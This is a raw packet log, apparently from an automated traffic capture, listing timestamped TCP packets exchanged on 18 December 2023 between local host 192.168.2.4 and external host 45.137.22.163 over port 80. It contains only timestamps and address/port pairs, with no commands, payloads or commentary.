                                        Dec 18, 2023 14:31:19.994430065 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:19.994462967 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:19.994496107 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.235718012 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.235743046 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.235816956 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.235871077 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.235883951 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.235948086 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.235984087 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.236067057 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.236121893 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.236134052 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.236274004 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.236310005 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.236325026 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.477183104 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.477237940 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.477304935 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.477396011 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.477401972 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.477492094 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.477497101 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.477554083 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.477602005 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.477648020 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.477763891 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.477830887 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.477829933 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.477906942 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.477956057 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.478029966 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.478111982 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.478125095 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.478162050 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.478198051 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.478261948 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.478307962 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.478312969 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.478375912 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.478425980 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.478426933 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.727920055 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.727941036 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.727953911 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.727968931 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.727979898 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.727989912 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.728028059 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.728033066 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728079081 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728117943 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.728132963 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728193998 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728241920 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.728245020 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728259087 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728308916 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.728328943 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728342056 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728385925 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.728388071 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728501081 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728543997 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.728569031 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728620052 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728679895 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.728710890 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728758097 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728795052 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728802919 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.728888035 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.728930950 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.729013920 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729099035 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729139090 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729175091 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729187965 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.729222059 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729264975 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.729298115 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729326963 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729367018 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.729407072 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729517937 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729556084 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.729581118 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729640961 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729682922 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.729707003 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729765892 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729777098 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.729814053 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.969286919 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969322920 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969363928 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969423056 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969445944 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969465017 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.969491959 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969528913 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969588995 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969633102 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.969634056 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969633102 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.969644070 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.969659090 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969700098 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969707966 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.969784021 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969830990 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.969850063 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969898939 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.969939947 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.969968081 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970043898 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970089912 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.970110893 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970175028 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970217943 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.970238924 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970308065 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970354080 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.970387936 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970475912 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970523119 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.970546961 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970635891 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970668077 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970680952 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.970731020 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970777988 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970824003 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.970858097 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970895052 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.970937967 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.971039057 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971105099 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971151114 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.971160889 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971210003 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971245050 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971252918 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.971302986 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971322060 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971345901 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.971371889 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971407890 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971417904 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.971463919 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971493959 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971508980 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.971534014 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971585989 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971591949 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.971616030 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971646070 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971668005 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.971688032 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971734047 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.971741915 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971801043 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971839905 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971852064 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.971914053 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971945047 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.971957922 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.972023964 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972068071 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972099066 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972112894 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.972146988 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972187042 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972193956 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.972229958 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972259045 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972275019 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.972299099 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972346067 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.972368956 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972394943 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972440958 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.972444057 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972456932 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972495079 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.972502947 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972589016 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972601891 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972615957 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972626925 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:20.972640038 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:20.972670078 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.216592073 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216610909 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216636896 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216680050 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.216689110 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216702938 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216746092 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216761112 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216778040 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.216804028 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.216830015 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216842890 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216855049 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216866970 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216875076 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.216911077 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.216943979 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216957092 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216968060 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216980934 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216991901 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.216993093 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217015028 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217025995 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217037916 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217040062 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217062950 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217075109 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217091084 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217104912 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217117071 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217128992 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217175007 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217181921 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217214108 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217258930 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217264891 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217277050 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217325926 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217329025 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217369080 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217381954 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217418909 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217438936 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217462063 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217492104 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217535019 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217576027 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217602968 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217633963 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217690945 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217746019 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217758894 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217792988 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217804909 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217813969 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217845917 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217850924 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217864990 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217876911 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217889071 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217900991 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217940092 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217943907 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.217956066 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217969894 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.217993975 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218005896 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218017101 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218028069 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218029976 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218043089 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218050003 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218075991 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218089104 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218102932 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218112946 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218144894 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218152046 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218166113 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218172073 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218198061 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218211889 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218231916 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218242884 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218285084 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218291998 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218359947 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218403101 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218411922 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218416929 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218440056 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218466043 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218487978 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218533039 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218540907 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218554974 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218611956 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218622923 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218625069 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218684912 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218688011 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218702078 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218729019 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218748093 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218774080 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218796968 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218821049 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218885899 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218899012 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218930960 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218940973 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.218945026 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218957901 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.218985081 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219005108 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219005108 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219017982 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219029903 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219063044 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219065905 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219098091 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219104052 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219111919 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219135046 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219172955 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219176054 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219189882 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219229937 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219271898 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219285011 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219320059 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219330072 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219353914 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219367027 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219377041 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219413996 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219413996 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219481945 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219494104 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219532967 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219554901 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219609976 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219616890 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219631910 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219641924 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219654083 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219676971 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219677925 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219708920 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219718933 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219733000 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219754934 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219784975 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219801903 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219810963 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219815016 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219836950 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219847918 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219865084 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.219927073 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219939947 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219949961 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219961882 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.219974995 CET804973045.137.22.163192.168.2.4
